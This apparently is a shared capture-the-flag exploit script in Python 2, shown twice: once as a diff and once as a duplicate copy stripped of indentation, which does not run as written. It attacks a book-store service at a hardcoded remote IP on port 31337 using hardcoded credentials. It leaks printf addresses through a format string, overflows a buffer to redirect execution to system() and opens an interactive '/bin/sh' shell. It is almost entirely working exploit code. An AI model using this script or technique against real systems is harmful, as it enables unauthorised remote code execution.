eboda · March 17, 2015 11:55
diff --git a/exploit.py b/exploit.py
 #!/usr/bin/env python
 #coding: UTF-8
 
 import struct
 import socket
 import telnetlib 
 import sys

 if len(sys.argv) > 1 and sys.argv[1] == "l":
    print "=== local exploit"
    system_offset = 0xd0f0
    TARGET = ('localhost', 31337)
 else:
    print "=== remote exploit"
    system_offset = 0xcf70
    TARGET = ('54.65.210.251', 31337)


 def e(s):
    return s.encode('UTF-8')


 def d(s):
    return s.decode('UTF-8')


 def p(d, fmt='<I'):
    return struct.pack(fmt, d)


 def u(d, fmt='<I'):
    return struct.unpack(fmt, d)


 def u1(d, fmt='<I'):
    return u(d, fmt)[0]


 def readtil(delim):
    buf = b''
    while not e(delim) in buf:
        buf += s.recv(1)
    return buf


 def read(num):
    return s.recv(num)


 def sendln(b):
    s.sendall(str(b) + b'\n')


 def send(b):
    s.sendall(b)

 ###########################################################################

 def start_modify(book_id):
    sendln("2")
    readtil(" : ")
    sendln(str(book_id))
    readtil("u!\n")





 def modify_info(stock, price, shipping, available, name, description):
    print "\t- Modify Information"
    sendln("3")
    readtil(" : \n")
    sendln(stock)
    readtil(" : \n")
    sendln(price)
    readtil(") \n")
    sendln(shipping)
    readtil(" :\n")
    sendln(available)
    readtil("name\n")
    sendln(name)
    readtil("ion\n")
    sendln(description)
    readtil("u!\n")


 def display_info(book_id):
    print "\t- Display Info"
    sendln("3")
    readtil(" : ")
    sendln(book_id)
    return readtil("> ")


 def create_book(name, description):
    print "\t- Create Book"
    sendln("1")
    readtil(": \n")
    sendln(name)
    readtil(": \n")
    sendln(description)
    readtil(")\n")
    sendln("0")
    readtil("> ")


 def modify_shipping(shipping):
    print "\t- Modify Shipping"
    sendln("4")
    readtil(")\n")

    sendln(shipping)
    readtil("u!\n")


 def modify_description(desc):
    print "\t- Modify Description"
    sendln("2")
    readtil("ion\n")
    sendln(desc + "\x00")
    readtil("u!\n")



 def main_menu():
    sendln("0")
    readtil("> ")


 def pwn():
    global s
    s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
    s.setsockopt( socket.IPPROTO_TCP, socket.TCP_NODELAY, 1 )
    s.connect(TARGET)

    # Login
    print "[x] Login"
    readtil(" : ")
    send("helloadmin")
    readtil(" : ")
    send("iulover!@#$")
    readtil("> ")

    create_book("book1", "description of book1")

    # first leak printf@plt and printf@got address
    start_modify(0)
    modify_info(99999999, 99999999, 1, 1, "AAAAAAAAAAAAAAAAAAAAAAA", "AAAAAAAAAAAA")
    main_menu()
    name = display_info("0").split("name : '")[1]
    print_shipping = u1(name[28:32])

    printf_plt = print_shipping - 0x32d 
    printf_got = printf_plt + 0x3990
    print "[x] printf@plt " + hex(printf_plt)
    print "[x] printf@got " + hex(printf_got)

    # read printf@libc address from printf@got
    create_book("book2", "desc2")
    start_modify(1)

    payload_printf_libc = "A" * 2672 + p(printf_plt) + "\n"
    modify_description(payload_printf_libc)
    modify_info(9999999, 999999999, 0, 1, "aaaa" + p(printf_got) +"%11$s", "A")
    modify_shipping(1)
    main_menu()

    # fetch printf@libc and calculate system@libc with offset
    printf_libc = u1(display_info(1).split("aaaa")[1][4:8])
    system_libc = printf_libc - system_offset

    print "[x] printf@libc " + hex(printf_libc)
    print "[x] system@libc " + hex(system_libc)

    # final exploit, simply call system() and provide /bin/sh as name
    start_modify(1)

    payload_exploit = "A" * 2672 + p(system_libc) + "\n"
    modify_description(payload_exploit)
    modify_info(99999999, 99999999, 0, 1, "/bin/sh\x00", "xyz")
    modify_shipping(1)
    main_menu()

    print "[x] your shell:"
    sendln(3)
    readtil(" : ")
    sendln(1)
    readtil("xyz")

    # interact with shell
    t = telnetlib.Telnet()
    t.sock = s
    t.interact() 



 pwn()
	#!/usr/bin/env python
	#coding: UTF-8

	import struct
	import socket
	import telnetlib
	import sys

	if len(sys.argv) > 1 and sys.argv[1] == "l":
	print "=== local exploit"
	system_offset = 0xd0f0
	TARGET = ('localhost', 31337)
	else:
	print "=== remote exploit"
	system_offset = 0xcf70
	TARGET = ('54.65.210.251', 31337)


	def e(s):
	return s.encode('UTF-8')


	def d(s):
	return s.decode('UTF-8')


	def p(d, fmt='<I'):
	return struct.pack(fmt, d)


	def u(d, fmt='<I'):
	return struct.unpack(fmt, d)


	def u1(d, fmt='<I'):
	return u(d, fmt)[0]


	def readtil(delim):
	buf = b''
	while not e(delim) in buf:
	buf += s.recv(1)
	return buf


	def read(num):
	return s.recv(num)


	def sendln(b):
	s.sendall(str(b) + b'\n')


	def send(b):
	s.sendall(b)

	###########################################################################

	def start_modify(book_id):
	sendln("2")
	readtil(" : ")
	sendln(str(book_id))
	readtil("u!\n")





	def modify_info(stock, price, shipping, available, name, description):
	print "\t- Modify Information"
	sendln("3")
	readtil(" : \n")
	sendln(stock)
	readtil(" : \n")
	sendln(price)
	readtil(") \n")
	sendln(shipping)
	readtil(" :\n")
	sendln(available)
	readtil("name\n")
	sendln(name)
	readtil("ion\n")
	sendln(description)
	readtil("u!\n")


	def display_info(book_id):
	print "\t- Display Info"
	sendln("3")
	readtil(" : ")
	sendln(book_id)
	return readtil("> ")


	def create_book(name, description):
	print "\t- Create Book"
	sendln("1")
	readtil(": \n")
	sendln(name)
	readtil(": \n")
	sendln(description)
	readtil(")\n")
	sendln("0")
	readtil("> ")


	def modify_shipping(shipping):
	print "\t- Modify Shipping"
	sendln("4")
	readtil(")\n")

	sendln(shipping)
	readtil("u!\n")


	def modify_description(desc):
	print "\t- Modify Description"
	sendln("2")
	readtil("ion\n")
	sendln(desc + "\x00")
	readtil("u!\n")



	def main_menu():
	sendln("0")
	readtil("> ")


	def pwn():
	global s
	s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
	s.setsockopt( socket.IPPROTO_TCP, socket.TCP_NODELAY, 1 )
	s.connect(TARGET)

	# Login
	print "[x] Login"
	readtil(" : ")
	send("helloadmin")
	readtil(" : ")
	send("iulover!@#$")
	readtil("> ")

	create_book("book1", "description of book1")

	# first leak printf@plt and printf@got address
	start_modify(0)
	modify_info(99999999, 99999999, 1, 1, "AAAAAAAAAAAAAAAAAAAAAAA", "AAAAAAAAAAAA")
	main_menu()
	name = display_info("0").split("name : '")[1]
	print_shipping = u1(name[28:32])

	printf_plt = print_shipping - 0x32d
	printf_got = printf_plt + 0x3990
	print "[x] printf@plt " + hex(printf_plt)
	print "[x] printf@got " + hex(printf_got)

	# read printf@libc address from printf@got
	create_book("book2", "desc2")
	start_modify(1)

	payload_printf_libc = "A" * 2672 + p(printf_plt) + "\n"
	modify_description(payload_printf_libc)
	modify_info(9999999, 999999999, 0, 1, "aaaa" + p(printf_got) +"%11$s", "A")
	modify_shipping(1)
	main_menu()

	# fetch printf@libc and calculate system@libc with offset
	printf_libc = u1(display_info(1).split("aaaa")[1][4:8])
	system_libc = printf_libc - system_offset

	print "[x] printf@libc " + hex(printf_libc)
	print "[x] system@libc " + hex(system_libc)

	# final exploit, simply call system() and provide /bin/sh as name
	start_modify(1)

	payload_exploit = "A" * 2672 + p(system_libc) + "\n"
	modify_description(payload_exploit)
	modify_info(99999999, 99999999, 0, 1, "/bin/sh\x00", "xyz")
	modify_shipping(1)
	main_menu()

	print "[x] your shell:"
	sendln(3)
	readtil(" : ")
	sendln(1)
	readtil("xyz")

	# interact with shell
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()



	pwn()